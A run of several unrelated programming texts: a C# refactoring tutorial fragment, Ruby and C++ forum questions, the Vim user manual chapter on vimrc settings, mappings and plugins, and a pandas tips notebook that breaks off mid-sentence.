{ public PowerBank Power ; // Name of power bank public int RentedTime;// Lease time public Rental(PowerBank powerbk,int rentedTime) { Power = powerbk; RentedTime = rentedTime; } /// ///Calculate the points according to the consumption amount and the location of the power bank /// /// public int GetFrequentRenterPoints() { return this.Power.GetFrequentRenterPoints(RentedTime); } /// ///Calculate the total amount according to the order of power bank /// /// public decimal GetAmount() { return this.Power.GetAmount(RentedTime); } } } 3. Our test cases remain unchanged. After each refactoring, we need to call the above test cases to check whether the refactoring has side effects. At present, the dependencies between our classes have not changed much, but the methods in the corresponding classes have changed. Find the menu item “test — > run all tests” on the menu bar of visual studio 2019. Or select “run all tests in view” button in “test Explorer” to run test cases. Monitor whether the reconstruction results are correct. As shown below.
https://developpaper.com/code-refactoring-and-unit-testing-continue-to-move-the-corresponding-methods-8/
CC-MAIN-2022-40
refinedweb
695
53
I am writing a small ruby script that will be accepting input from postfix’s pipe command (ie, not running via the shell, directly executing). One of the things I need to do it spec the exit codes to make sure I am returing the correct exit codes for each condition as Postfix will then return SMTP errors as appropriate. I have two files that concern this bit of the program, init.rb and init_spec.rb. init.rb right now looks like this: class Init exit 1 end init_spec.rb looks like this: require ‘spec’ require ‘systemu’ require ‘init’ describe Init do it “should exit on status code 1 without parameters” command = “ruby mail_dump/init.rb” # not portable status, stdout, stderr = systemu command status.should == # what do I put here? end end I have tried a number of things, from trying to stub exit to aliasing kernel.exit to something else and replacing it… all without joy. The spec runs and hits the “exit 1” in init.rb and does what it is mean to do… exit. But that also exits RSpec and so the test is never run! The only thing I found DID work is if I alias Kernel.exit inside the init.rb file to “real_exit” and then redefine Kernel exit like so: class Object module Kernel alias real_exit exit def exit(arg) return true if arg == 1 end end end and then test exit by mocking it and making sure it returns true… but a spec that has to modify the test code isn’t going to scale too well… and this doesn’t seem right. Has anyone else had this problem? How did you solve it? thanks… Mikel
https://www.ruby-forum.com/t/specing-exit-codes/116545
CC-MAIN-2021-43
refinedweb
283
73.27
First of all, thanks for all those who have helped me in the past and those who are about to. I only have my prog written for the first part of my Q, the 2nd part, i need help setting up. 1) How do i store the numbers in a 5 x 3 array called Data[5][3]. I can have the user input data in the following prog, but how do i specifically call it "Data [5][3]. The reason I need to know this is becuase: 2) I need to have the program pass the array Data[ ][ ] from main ( ) to a function. My prof told me to use, float mean (const int Data [ ][ ], int, int ). I think it should look something like, mean (Data [ ][ ], 5, 3) heres my prog Code: #include <iostream> #include <iomanip> using namespace std; const int numrow = 5; const int numcol = 3; int main () { double data[numrow][numcol]; for (int i = 0; i <numrow; i++) { for (int j = 0; j < numcol; j++) { cout << "enter grades for row # " << (i + 1)<< ": "; cin >> data [i][j]; } } for (int a = 0; a < numrow; a++) { for (int b = 0; b < numcol; b++) { cout << setw (4) << data [a][b]; } cout << endl; } return 0; }
http://cboard.cprogramming.com/cplusplus-programming/77255-couple-questions-concerning-arrays-printable-thread.html
CC-MAIN-2016-36
refinedweb
202
77
The QStylePlugin class provides an abstract base for custom QStyle plugins. More... #include <QStylePlugin> Inherits QObject. The QStylePlugin class provides an abstract base for custom QStyle plugins. The also How to Create Qt Plugins. Constructs a style plugin with parent parent. This is invoked automatically by the Q_EXPORT_PLUGIN() macro. Destroys the style plugin. You never have to call this explicitly. Qt destroys a plugin automatically when it is no longer used. Creates and returns a QStyle object for the style key key. The style key is usually the class name of the required style. Reimplemented from QStyleFactoryInterface. See also keys(). Returns the list of style keys this plugin supports. These keys are usually the class names of the custom styles that are implemented in the plugin. Reimplemented from QFactoryInterface. See also create().
http://doc.trolltech.com/4.0/qstyleplugin.html
crawl-001
refinedweb
132
55.1
*usr_05.txt* For Vim version 7.3. Last change: 2009 Jun 04 VIM USER MANUAL - by Bram Moolenaar Set your settings Vim can be tuned to work like you want it to. This chapter shows you how to make Vim start with options set to different values. Add plugins to extend Vim's capabilities. Or define your own macros. |05.1| The vimrc file |05.2| The example vimrc file explained |05.3| Simple mappings |05.4| Adding a plugin |05.5| Adding a help file |05.6| The option window |05.7| Often used options Next chapter: |usr_06.txt| Using syntax highlighting Previous chapter: |usr_04.txt| Making small changes Table of contents: |usr_toc.txt| ============================================================================== *05.1* The vimrc file *vimrc-intro* You probably got tired of typing commands that you use very often. To start Vim with all your favorite option settings and mappings, you write them in what is called the vimrc file. Vim executes the commands in this file when it starts up. If you already have a vimrc file (e.g., when your sysadmin has one setup for you), you can edit it this way: > :edit $MYVIMRC If you don't have a vimrc file yet, see |vimrc| to find out where you can create a vimrc file. Also, the ":version" command mentions the name of the "user vimrc file" Vim looks for. For Unix and Macintosh this file is always used and is recommended: ~/.vimrc ~ For MS-DOS and MS-Windows you can use one of these: $HOME/_vimrc ~ $VIM/_vimrc ~ The vimrc file can contain all the commands that you type after a colon. The most simple ones are for setting options. For example, if you want Vim to always start with the 'incsearch' option on, add this line you your vimrc file: > set incsearch For this new line to take effect you need to exit Vim and start it again. Later you will learn how to do this without exiting Vim. This chapter only explains the most basic items. For more information on how to write a Vim script file: |usr_41.txt|. ============================================================================== *05.2* The example vimrc file explained *vimrc_example.vim* In the first chapter was explained how the example vimrc (included in the Vim distribution) file can be used to make Vim startup in not-compatible mode (see |not-compatible|). The file can be found here: $VIMRUNTIME/vimrc_example.vim ~ In this section we will explain the various commands used in this file. This will give you hints about how to set up your own preferences. Not everything will be explained though. Use the ":help" command to find out more. > set nocompatible As mentioned in the first chapter, these manuals explain Vim working in an improved way, thus not completely Vi compatible. Setting the 'compatible' option off, thus 'nocompatible' takes care of this. > set backspace=indent,eol,start This specifies where in Insert mode the <BS> is allowed to delete the character in front of the cursor. The three items, separated by commas, tell Vim to delete the white space at the start of the line, a line break and the character before where Insert mode started. > set autoindent This makes Vim use the indent of the previous line for a newly created line. Thus there is the same amount of white space before the new line. For example when pressing <Enter> in Insert mode, and when using the "o" command to open a new line. > if has("vms") set nobackup else set backup endif This tells Vim to keep a backup copy of a file when overwriting it. But not on the VMS system, since it keeps old versions of files already. The backup file will have the same name as the original file with "~" added. See |07.4| > set history=50 Keep 50 commands and 50 search patterns in the history. Use another number if you want to remember fewer or more lines. > set ruler Always display the current cursor position in the lower right corner of the Vim window. > set showcmd Display an incomplete command in the lower right corner of the Vim window, left of the ruler. For example, when you type "2f", Vim is waiting for you to type the character to find and "2f" is displayed. When you press "w" next, the "2fw" command is executed and the displayed "2f" is removed. +-------------------------------------------------+ |text in the Vim window | |~ | |~ | |-- VISUAL -- 2f 43,8 17% | +-------------------------------------------------+ ^^^^^^^^^^^ ^^^^^^^^ ^^^^^^^^^^ 'showmode' 'showcmd' 'ruler' > set incsearch Display the match for a search pattern when halfway typing it. > map Q gq This defines a key mapping. More about that in the next section. This defines the "Q" command to do formatting with the "gq" operator. This is how it worked before Vim 5.0. Otherwise the "Q" command starts Ex mode, but you will not need it. > vnoremap _g y:exe "grep /" . escape(@", '\\/') . "/ *.c *.h"<CR> This mapping yanks the visually selected text and searches for it in C files. This is a complicated mapping. You can see that mappings can be used to do quite complicated things. Still, it is just a sequence of commands that are executed like you typed them. > if &t_Co > 2 || has("gui_running") syntax on set hlsearch endif This switches on syntax highlighting, but only if colors are available. And the 'hlsearch' option tells Vim to highlight matches with the last used search pattern. The "if" command is very useful to set options only when some condition is met. More about that in |usr_41.txt|. *vimrc-filetype* > filetype plugin indent on This switches on three very clever mechanisms: 1. Filetype detection. Whenever you start editing a file, Vim will try to figure out what kind of file this is. When you edit "main.c", Vim will see the ".c" extension and recognize this as a "c" filetype. When you edit a file that starts with "#!/bin/sh", Vim will recognize it as a "sh" filetype. The filetype detection is used for syntax highlighting and the other two items below. See |filetypes|. 2. Using filetype plugin files Many different filetypes are edited with different options. For example, when you edit a "c" file, it's very useful to set the 'cindent' option to automatically indent the lines. These commonly useful option settings are included with Vim in filetype plugins. You can also add your own, see |write-filetype-plugin|. 3. Using indent files When editing programs, the indent of a line can often be computed automatically. Vim comes with these indent rules for a number of filetypes. See |:filetype-indent-on| and 'indentexpr'. > autocmd FileType text setlocal textwidth=78 This makes Vim break text to avoid lines getting longer than 78 characters. But only for files that have been detected to be plain text. There are actually two parts here. "autocmd FileType text" is an autocommand. This defines that when the file type is set to "text" the following command is automatically executed. "setlocal textwidth=78" sets the 'textwidth' option to 78, but only locally in one file. *restore-cursor* > autocmd BufReadPost * \ if line("'\"") > 1 && line("'\"") <= line("$") | \ exe "normal! g`\"" | \ endif Another autocommand. This time it is used after reading any file. The complicated stuff after it checks if the '" mark is defined, and jumps to it if so. The backslash at the start of a line is used to continue the command from the previous line. That avoids a line getting very long. See |line-continuation|. This only works in a Vim script file, not when typing commands at the command-line. ============================================================================== *05.3* Simple mappings A mapping enables you to bind a set of Vim commands to a single key. Suppose, for example, that you need to surround certain words with curly braces. In other words, you need to change a word such as "amount" into "{amount}". With the :map command, you can tell Vim that the F5 key does this job. The command is as follows: > :map <F5> i{<Esc>ea}<Esc> < Note: When entering this command, you must enter <F5> by typing four characters. Similarly, <Esc> is not entered by pressing the <Esc> key, but by typing five characters. Watch out for this difference when reading the manual! Let's break this down: <F5> The F5 function key. This is the trigger key that causes the command to be executed as the key is pressed. i{<Esc> Insert the { character. The <Esc> key ends Insert mode. e Move to the end of the word. a}<Esc> Append the } to the word. After you execute the ":map" command, all you have to do to put {} around a word is to put the cursor on the first character and press F5. In this example, the trigger is a single key; it can be any string. But when you use an existing Vim command, that command will no longer be available. You better avoid that. One key that can be used with mappings is the backslash. Since you probably want to define more than one mapping, add another character. You could map "\p" to add parentheses around a word, and "\c" to add curly braces, for example: > :map \p i(<Esc>ea)<Esc> :map \c i{<Esc>ea}<Esc> You need to type the \ and the p quickly after another, so that Vim knows they belong together. The ":map" command (with no arguments) lists your current mappings. At least the ones for Normal mode. More about mappings in section |40.1|. ============================================================================== *05.4* Adding a plugin *add-plugin* *plugin* Vim's functionality can be extended by adding plugins. A plugin is nothing more than a Vim script file that is loaded automatically when Vim starts. You can add a plugin very easily by dropping it in your plugin directory. {not available when Vim was compiled without the |+eval| feature} There are two types of plugins: global plugin: Used for all kinds of files filetype plugin: Only used for a specific type of file The global plugins will be discussed first, then the filetype ones |add-filetype-plugin|. GLOBAL PLUGINS *standard-plugin* When you start Vim, it will automatically load a number of global plugins. You don't have to do anything for this. They add functionality that most people will want to use, but which was implemented as a Vim script instead of being compiled into Vim. You can find them listed in the help index |standard-plugin-list|. Also see |load-plugins|. *add-global-plugin* You can add a global plugin to add functionality that will always be present when you use Vim. There are only two steps for adding a global plugin: 1. Get a copy of the plugin. 2. Drop it in the right directory. GETTING A GLOBAL PLUGIN Where can you find plugins? - Some come with Vim. You can find them in the directory $VIMRUNTIME/macros and its sub-directories. - Download from the net. There is a large collection on. - They are sometimes posted in a Vim |maillist|. - You could write one yourself, see |write-plugin|. Some plugins come as a vimball archive, see |vimball|. Some plugins can be updated automatically, see |getscript|. USING A GLOBAL PLUGIN First read the text in the plugin itself to check for any special conditions. Then copy the file to your plugin directory: system plugin directory ~ Unix ~/.vim/plugin/ PC and OS/2 $HOME/vimfiles/plugin or $VIM/vimfiles/plugin Amiga s:vimfiles/plugin Macintosh $VIM:vimfiles:plugin Mac OS X ~/.vim/plugin/ RISC-OS Choices:vimfiles.plugin Example for Unix (assuming you didn't have a plugin directory yet): > mkdir ~/.vim mkdir ~/.vim/plugin cp /usr/local/share/vim/vim60/macros/justify.vim ~/.vim/plugin That's all! Now you can use the commands defined in this plugin to justify text. Instead of putting plugins directly into the plugin/ directory, you may better organize them by putting them into subdirectories under plugin/. As an example, consider using "~/.vim/plugin/perl/*.vim" for all your Perl plugins. FILETYPE PLUGINS *add-filetype-plugin* *ftplugins* The Vim distribution comes with a set of plugins for different filetypes that you can start using with this command: > :filetype plugin on That's all! See |vimrc-filetype|. If you are missing a plugin for a filetype you are using, or you found a better one, you can add it. There are two steps for adding a filetype plugin: 1. Get a copy of the plugin. 2. Drop it in the right directory. GETTING A FILETYPE PLUGIN You can find them in the same places as the global plugins. Watch out if the type of file is mentioned, then you know if the plugin is a global or a filetype one. The scripts in $VIMRUNTIME/macros are global ones, the filetype plugins are in $VIMRUNTIME/ftplugin. USING A FILETYPE PLUGIN *ftplugin-name* You can add a filetype plugin by dropping it in the right directory. The name of this directory is in the same directory mentioned above for global plugins, but the last part is "ftplugin". Suppose you have found a plugin for the "stuff" filetype, and you are on Unix. Then you can move this file to the ftplugin directory: > mv thefile ~/.vim/ftplugin/stuff.vim If that file already exists you already have a plugin for "stuff". You might want to check if the existing plugin doesn't conflict with the one you are adding. If it's OK, you can give the new one another name: > mv thefile ~/.vim/ftplugin/stuff_too.vim The underscore is used to separate the name of the filetype from the rest, which can be anything. If you use "otherstuff.vim" it wouldn't work, it would be loaded for the "otherstuff" filetype. On MS-DOS you cannot use long filenames. You would run into trouble if you add a second plugin and the filetype has more than six characters. You can use an extra directory to get around this: > mkdir $VIM/vimfiles/ftplugin/fortran copy thefile $VIM/vimfiles/ftplugin/fortran/too.vim The generic names for the filetype plugins are: > ftplugin/<filetype>.vim ftplugin/<filetype>_<name>.vim ftplugin/<filetype>/<name>.vim Here "<name>" can be any name that you prefer. Examples for the "stuff" filetype on Unix: > ~/.vim/ftplugin/stuff.vim ~/.vim/ftplugin/stuff_def.vim ~/.vim/ftplugin/stuff/header.vim The <filetype> part is the name of the filetype the plugin is to be used for. Only files of this filetype will use the settings from the plugin. The <name> part of the plugin file doesn't matter, you can use it to have several plugins for the same filetype. Note that it must end in ".vim". Further reading: |filetype-plugins| Documentation for the filetype plugins and information about how to avoid that mappings cause problems. |load-plugins| When the global plugins are loaded during startup. |ftplugin-overrule| Overruling the settings from a global plugin. |write-plugin| How to write a plugin script. |plugin-details| For more information about using plugins or when your plugin doesn't work. |new-filetype| How to detect a new file type. ============================================================================== *05.5* Adding a help file *add-local-help* *matchit-install* If you are lucky, the plugin you installed also comes with a help file. We will explain how to install the help file, so that you can easily find help for your new plugin. Let us use the "matchit.vim" plugin as an example (it is included with Vim). This plugin makes the "%" command jump to matching HTML tags, if/else/endif in Vim scripts, etc. Very useful, although it's not backwards compatible (that's why it is not enabled by default). This plugin comes with documentation: "matchit.txt". Let's first copy the plugin to the right directory. This time we will do it from inside Vim, so that we can use $VIMRUNTIME. (You may skip some of the "mkdir" commands if you already have the directory.) > :!mkdir ~/.vim :!mkdir ~/.vim/plugin :!cp $VIMRUNTIME/macros/matchit.vim ~/.vim/plugin The "cp" command is for Unix, on MS-DOS you can use "copy". Now create a "doc" directory in one of the directories in 'runtimepath'. > :!mkdir ~/.vim/doc Copy the help file to the "doc" directory. > :!cp $VIMRUNTIME/macros/matchit.txt ~/.vim/doc Now comes the trick, which allows you to jump to the subjects in the new help file: Generate the local tags file with the |:helptags| command. > :helptags ~/.vim/doc Now you can use the > :help g% command to find help for "g%" in the help file you just added. You can see an entry for the local help file when you do: > :help local-additions The title lines from the local help files are automagically added to this section. There you can see which local help files have been added and jump to them through the tag. For writing a local help file, see |write-local-help|. ============================================================================== *05.6* The option window If you are looking for an option that does what you want, you can search in the help files here: |options|. Another way is by using this command: > :options This opens a new window, with a list of options with a one-line explanation. The options are grouped by subject. Move the cursor to a subject and press <Enter> to jump there. Press <Enter> again to jump back. Or use CTRL-O. You can change the value of an option. For example, move to the "displaying text" subject. Then move the cursor down to this line: set wrap nowrap ~ When you hit <Enter>, the line will change to: set nowrap wrap ~ The option has now been switched off. Just above this line is a short description of the 'wrap' option. Move the cursor one line up to place it in this line. Now hit <Enter> and you jump to the full help on the 'wrap' option. For options that take a number or string argument you can edit the value. Then press <Enter> to apply the new value. For example, move the cursor a few lines up to this line: set so=0 ~ Position the cursor on the zero with "$". Change it into a five with "r5". Then press <Enter> to apply the new value. When you now move the cursor around you will notice that the text starts scrolling before you reach the border. This is what the 'scrolloff' option does, it specifies an offset from the window border where scrolling starts. ============================================================================== *05.7* Often used options There are an awful lot of options. Most of them you will hardly ever use. Some of the more useful ones will be mentioned here. Don't forget you can find more help on these options with the ":help" command, with single quotes before and after the option name. For example: > :help 'wrap' In case you have messed up an option value, you can set it back to the default by putting an ampersand (&) after the option name. Example: > :set iskeyword& NOT WRAPPING LINES Vim normally wraps long lines, so that you can see all of the text. Sometimes it's better to let the text continue right of the window. Then you need to scroll the text left-right to see all of a long line. Switch wrapping off with this command: > :set nowrap Vim will automatically scroll the text when you move to text that is not displayed. To see a context of ten characters, do this: > :set sidescroll=10 This doesn't change the text in the file, only the way it is displayed. WRAPPING MOVEMENT COMMANDS Most commands for moving around will stop moving at the start and end of a line. You can change that with the 'whichwrap' option. This sets it to the default value: > :set whichwrap=b,s This allows the <BS> key, when used in the first position of a line, to move the cursor to the end of the previous line. And the <Space> key moves from the end of a line to the start of the next one. To allow the cursor keys <Left> and <Right> to also wrap, use this command: > :set whichwrap=b,s,<,> This is still only for Normal mode. To let <Left> and <Right> do this in Insert mode as well: > :set whichwrap=b,s,<,>,[,] There are a few other flags that can be added, see 'whichwrap'. VIEWING TABS When there are tabs in a file, you cannot see where they are. To make them visible: > :set list Now every tab is displayed as ^I. And a $ is displayed at the end of each line, so that you can spot trailing spaces that would otherwise go unnoticed. A disadvantage is that this looks ugly when there are many Tabs in a file. If you have a color terminal, or are using the GUI, Vim can show the spaces and tabs as highlighted characters. Use the 'listchars' option: > :set listchars=tab:>-,trail:- Now every tab will be displayed as ">---" (with more or less "-") and trailing white space as "-". Looks a lot better, doesn't it? KEYWORDS The 'iskeyword' option specifies which characters can appear in a word: > :set iskeyword < iskeyword=@,48-57,_,192-255 ~ The "@" stands for all alphabetic letters. "48-57" stands for ASCII characters 48 to 57, which are the numbers 0 to 9. "192-255" are the printable latin characters. Sometimes you will want to include a dash in keywords, so that commands like "w" consider "upper-case" to be one word. You can do it like this: > :set iskeyword+=- :set iskeyword < iskeyword=@,48-57,_,192-255,- ~ If you look at the new value, you will see that Vim has added a comma for you. To remove a character use "-=". For example, to remove the underscore: > :set iskeyword-=_ :set iskeyword < iskeyword=@,48-57,192-255,- ~ This time a comma is automatically deleted. ROOM FOR MESSAGES When Vim starts there is one line at the bottom that is used for messages. When a message is long, it is either truncated, thus you can only see part of it, or the text scrolls and you have to press <Enter> to continue. You can set the 'cmdheight' option to the number of lines used for messages. Example: > :set cmdheight=3 This does mean there is less room to edit text, thus it's a compromise. ============================================================================== Next chapter: |usr_06.txt| Using syntax highlighting Copyright: see |manual-copyright| vim:tw=78:ts=8:ft=help:norl:
http://opensource.apple.com/source/vim/vim-48.1/runtime/doc/usr_05.txt
CC-MAIN-2016-30
refinedweb
3,723
74.59
Hi, I have created a database and am using it in a list. One of the fields is a hyperlink to YouTube videos. I'm trying to find a way to "hide" the hyperlink and have the user press on a button in the selected row. Any thoughts? Jeff If you mean that you want a button to redirect you to that link instead of showing a hyperlink, You can place a button then assign onClick function. Inside it you can use Wix-Location and use the value from the database - The Link - as the path of wixLocation.to(). For more information on how to use wixLocation, take a look Here Best, Mustafa Mustafa, I have the following code to display videos (see below) in a list. The last field in the list is a hyperlink. If no filter is used then the video list appears in LIFO order. If the filter is used it displays the selected videos. At this point you must click directly on the Hyperlink, which is partially displayed, to go to the URL. Even though videos are displayed they are not selected. The color does change when you hover, but in order to go to the URL you would have to click on that item's hyperlink. My problem is that I want to hide the hyperlinks and only show buttonS in their place. I don't see how wixLocation.to() picks the particular record. Below is a screen shot example. Thank you for your input. Jeff import wixData from "wix-data"; let debounceTimer; //search by title export function input1_keyPress(event, $w) { if (debounceTimer) { clearTimeout(debounceTimer); debounceTimer = undefined; } debounceTimer = setTimeout(() => { filter($w('#input1').value,); }, 200); } let lastFilterTitle; function filter(titleAndPresenter) { if (lastFilterTitle !== titleAndPresenter) { let newFilter = wixData.filter(); $w('#dataset1').setFilter(wixData.filter().contains('titleAndPresenter',titleAndPresenter)); lastFilterTitle = titleAndPresenter; } }
https://www.wix.com/corvid/forum/community-discussion/hiding-a-hyperlink-in-a-database
CC-MAIN-2020-05
refinedweb
302
57.87
I like to use "New Posts" in the bar above to see what's happening on BHW. Unfortunately it's usually littered with Lounge posts, and I really don't care about them. Since I use Firefox and greasemonkey, and since BHW runs vbulletin I decided to see if anyone had done something about this on other forums. Turns out, they had. Code: Is a userscript to do exactly that on some australian overclocking forum. A bit of hackery later, and I've got this: Code: // ==UserScript== // @name Vbulletin Remove BHW Lounge from New Posts // @namespace // @description vBulletin: Hides selected forums from search results // @include?* // ==/UserScript== // Add comma-delimited quoted names of forums to hide, e.g. "Forum1", "Forum2" var HIDDEN_FORUMS = new Array("BlackHat Lounge"); var forumNamePredicates = ".= '" + HIDDEN_FORUMS.join("' or .= '") + "'"; var xpathExpression = "id('threadslist')/tbody/tr[td/a[" + forumNamePredicates + "]]"; var rows = document.evaluate(xpathExpression, document, null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null); for(var i = 0; i < rows.snapshotLength; i++) { var row = rows.snapshotItem(i); row.style.display = "none"; } I put it up for people to install at: Code: This will make lounge posts disappear entirely from your search results, all search results, including the "New Posts" page. If you need to search for something in the lounge, you'll have to disable greasemonkey. For those that don't have a damn clue what I'm talking about, greasemonkey is an extension to firefox that lets you modify websites to your liking with javascript. If you have greasemonkey installed and visit that warbucks.org page it'll ask if you want to install the script. Feel free to view the source of it to make sure it's the same as what I pasted above and that I'm not screwing you. If you click Install then the next time you view search results on BHW, boom, no Lounge. And yes, I'm fully aware of how ironic it is to be announcing a script to strip lounge posts on the lounge itself.
https://www.blackhatworld.com/seo/greasemonkey-script-to-strip-lounge-posts-out-of-the-new-posts-page.156216/
CC-MAIN-2017-30
refinedweb
330
64.71
0 There are websites such as that provide information about secondhand vehicles. Design a base class for vehicle with fields such as model, year, total mileage, vehicle identification number (VIN), EPA class, EPA mileage, engine, transmission, and options. Design subclasses for car, truck, SUV, and minivan. Think about the specific fields and methods required for the subclasses. This what I got so far am I doing it right... class UsedVehicle(object): def __int__(self, model, year, total mileage, VIN\ , EPA, EPA mileage, engine, transmission): self.model = model self.year = year self.total mileage = total mileage self.VIN = VIN self.EPA = EPA self.EPA mileage = EPA mileage self.engine = engine self.transmission = transmission def __repr__(model): return self.model() def __repr__(year): return self.year()
https://www.daniweb.com/programming/software-development/threads/442482/used-vehicle-classes
CC-MAIN-2016-30
refinedweb
124
64.07
#include "core/or/or.h" #include "core/or/circuitbuild.h" #include "core/crypto/onion_crypto.h" #include "core/crypto/onion_fast.h" #include "core/crypto/onion_ntor.h" #include "core/crypto/onion_tap.h" #include "feature/relay/router.h" #include "lib/crypt_ops/crypto_dh.h" #include "lib/crypt_ops/crypto_util.h" #include "core/or/crypt_path_st.h" #include "core/or/extend_info_st.h" Go to the source code of this file. Functions to handle different kinds of circuit extension crypto.. Definition in file onion_crypto.c. Release whatever storage is held in state, depending on its type, and clear its pointer. Definition at line 79 of file onion_crypto.c. Referenced by circuit_free_cpath_node(). Perform the final (client-side) step of a circuit-creation handshake of type type, using our state in handshake_state and the server's response in reply. On success, generate keys_out_len bytes worth of key material in keys_out_len, set rend_authenticator_out to the "KH" field that can be used to establish introduction points at this hop, and return 0. On failure, return -1, and set *msg_out to an error message if this is worth complaining to the user about. Definition at line 247 of file onion_crypto.c. Perform the first step of a circuit-creation handshake of type type (one of ONION_HANDSHAKE_TYPE_*): generate the initial "onion skin" in onion_skin_out, and store any state information in state_out. Return -1 on failure, and the length of the onionskin on acceptance. Definition at line 110 of file onion_crypto.c. Perform the second (server-side) step of a circuit-creation handshake of type type, responding to the client request in onion_skin using the keys in keys. On success, write our response into reply_out, generate keys_out_len bytes worth of key material in keys_out_len, a hidden service nonce to rend_nonce_out, and return the length of the reply. On failure, return -1. Definition at line 174 of file onion_crypto.c. Referenced by cpuworker_onion_handshake_threadfn(). Release all storage held in keys. Definition at line 63 of file onion_crypto.c. Return a new server_onion_keys_t object with all of the keys and other info we might need to do onion handshakes. (We make a copy of our keys for each cpuworker to avoid race conditions with the main thread, and to avoid locking) Definition at line 51 of file onion_crypto.c.
https://people.torproject.org/~nickm/tor-auto/doxygen/onion__crypto_8c.html
CC-MAIN-2019-04
refinedweb
371
61.12
import pandas as pd import numpy as np drinks = pd.read_csv('') movies = pd.read_csv('') orders = pd.read_csv('', sep='\t') orders['item_price'] = orders.item_price.str.replace('$', '').astype('float') stocks = pd.read_csv('', parse_dates=['Date']) titanic = pd.read_csv('') ufo = pd.read_csv('', parse_dates=['Time']) Sometimes you need to know the pandas version you're using, especially when reading the pandas documentation. You can show the pandas version by typing: pd.__version__ '0.24.2' But if you also need to know the versions of pandas' dependencies, you can use the show_versions() function: pd.show_versions() INSTALLED VERSIONS ------------------ commit: None python: 3.7.3.final.0 python-bits: 64 OS: Darwin OS-release: 18.6.0 machine: x86_64 processor: i386 byteorder: little LC_ALL: None LANG: en_US.UTF-8 LOCALE: en_US.UTF-8 pandas: 0.24.2 pytest: None pip: 19.1.1 setuptools: 41.0.1 Cython: None numpy: 1.16.4 scipy: None pyarrow: None xarray: None IPython: 7.5.0 sphinx: None patsy: None dateutil: 2.8.0 pytz: 2019.1 blosc: None bottleneck: None tables: None numexpr: None feather: None matplotlib: 3.1.0 openpyxl: None xlrd: None xlwt: None xlsxwriter: None lxml.etree: None bs4: None html5lib: None sqlalchemy: None pymysql: None psycopg2: None jinja2: 2.10.1 s3fs: None fastparquet: None pandas_gbq: None pandas_datareader: None gcsfs: None You can see the versions of Python, pandas, NumPy, matplotlib, and more. Let's say that you want to demonstrate some pandas code. You need an example DataFrame to work with. There are many ways to do this, but my favorite way is to pass a dictionary to the DataFrame constructor, in which the dictionary keys are the column names and the dictionary values are lists of column values: df = pd.DataFrame({'col one':[100, 200], 'col two':[300, 400]}) df Now if you need a much larger DataFrame, the above method will require way too much typing. In that case, you can use NumPy's random.rand() function, tell it the number of rows and columns, and pass that to the DataFrame constructor: pd.DataFrame(np.random.rand(4, 8)) That's pretty good, but if you also want non-numeric column names, you can coerce a string of letters to a list and then pass that list to the columns parameter: pd.DataFrame(np.random.rand(4, 8), columns=list('abcdefgh')) As you might guess, your string will need to have the same number of characters as there are columns. Let's take a look at the example DataFrame we created in the last trick: df I prefer to use dot notation to select pandas columns, but that won't work since the column names have spaces. Let's fix this. The most flexible method for renaming columns is the rename() method. You pass it a dictionary in which the keys are the old names and the values are the new names, and you also specify the axis: df = df.rename({'col one':'col_one', 'col two':'col_two'}, axis='columns') The best thing about this method is that you can use it to rename any number of columns, whether it be just one column or all columns. Now if you're going to rename all of the columns at once, a simpler method is just to overwrite the columns attribute of the DataFrame: df.columns = ['col_one', 'col_two'] Now if the only thing you're doing is replacing spaces with underscores, an even better method is to use the str.replace() method, since you don't have to type out all of the column names: df.columns = df.columns.str.replace(' ', '_') All three of these methods have the same result, which is to rename the columns so that they don't have any spaces: df Finally, if you just need to add a prefix or suffix to all of your column names, you can use the add_prefix() method... df.add_prefix('X_') ...or the add_suffix() method: df.add_suffix('_Y') Let's take a look at the drinks DataFrame: drinks.head() This is a dataset of average alcohol consumption by country. What if you wanted to reverse the order of the rows? The most straightforward method is to use the loc accessor and pass it ::-1, which is the same slicing notation used to reverse a Python list: drinks.loc[::-1].head() What if you also wanted to reset the index so that it starts at zero? You would use the reset_index() method and tell it to drop the old index entirely: drinks.loc[::-1].reset_index(drop=True).head() As you can see, the rows are in reverse order but the index has been reset to the default integer index. Similar to the previous trick, you can also use loc to reverse the left-to-right order of your columns: drinks.loc[:, ::-1].head() The colon before the comma means "select all rows", and the ::-1 after the comma means "reverse the columns", which is why "country" is now on the right side. Here are the data types of the drinks DataFrame: drinks.dtypes country object beer_servings int64 spirit_servings int64 wine_servings int64 total_litres_of_pure_alcohol float64 continent object dtype: object Let's say you need to select only the numeric columns. You can use the select_dtypes() method: drinks.select_dtypes(include='number').head() This includes both int and float columns. You could also use this method to select just the object columns: drinks.select_dtypes(include='object').head() You can tell it to include multiple data types by passing a list: drinks.select_dtypes(include=['number', 'object', 'category', 'datetime']).head() You can also tell it to exclude certain data types: drinks.select_dtypes(exclude='number').head() Let's create another example DataFrame: df = pd.DataFrame({'col_one':['1.1', '2.2', '3.3'], 'col_two':['4.4', '5.5', '6.6'], 'col_three':['7.7', '8.8', '-']}) df These numbers are actually stored as strings, which results in object columns: df.dtypes col_one object col_two object col_three object dtype: object In order to do mathematical operations on these columns, we need to convert the data types to numeric. You can use the astype() method on the first two columns: df.astype({'col_one':'float', 'col_two':'float'}).dtypes col_one float64 col_two float64 col_three object dtype: object However, this would have resulted in an error if you tried to use it on the third column, because that column contains a dash to represent zero and pandas doesn't understand how to handle it. Instead, you can use the to_numeric() function on the third column and tell it to convert any invalid input into NaN values: pd.to_numeric(df.col_three, errors='coerce') 0 7.7 1 8.8 2 NaN Name: col_three, dtype: float64 If you know that the NaN values actually represent zeros, you can fill them with zeros using the fillna() method: pd.to_numeric(df.col_three, errors='coerce').fillna(0) 0 7.7 1 8.8 2 0.0 Name: col_three, dtype: float64 Finally, you can apply this function to the entire DataFrame all at once by using the apply() method: df = df.apply(pd.to_numeric, errors='coerce').fillna(0) df This one line of code accomplishes our goal, because all of the data types have now been converted to float: df.dtypes col_one float64 col_two float64 col_three float64 dtype: object pandas DataFrames are designed to fit into memory, and so sometimes you need to reduce the DataFrame size in order to work with it on your system. Here's the size of the drinks DataFrame: drinks.info(memory_usage='deep') <class 'pandas.core.frame.DataFrame'> RangeIndex: 193 entries, 0 to 192 Data columns (total 6 columns): country 193 non-null object beer_servings 193 non-null int64 spirit_servings 193 non-null int64 wine_servings 193 non-null int64 total_litres_of_pure_alcohol 193 non-null float64 continent 193 non-null object dtypes: float64(1), int64(3), object(2) memory usage: 30.4 KB You can see that it currently uses 30.4 KB. If you're having performance problems with your DataFrame, or you can't even read it into memory, there are two easy steps you can take during the file reading process to reduce the DataFrame size. The first step is to only read in the columns that you actually need, which we specify 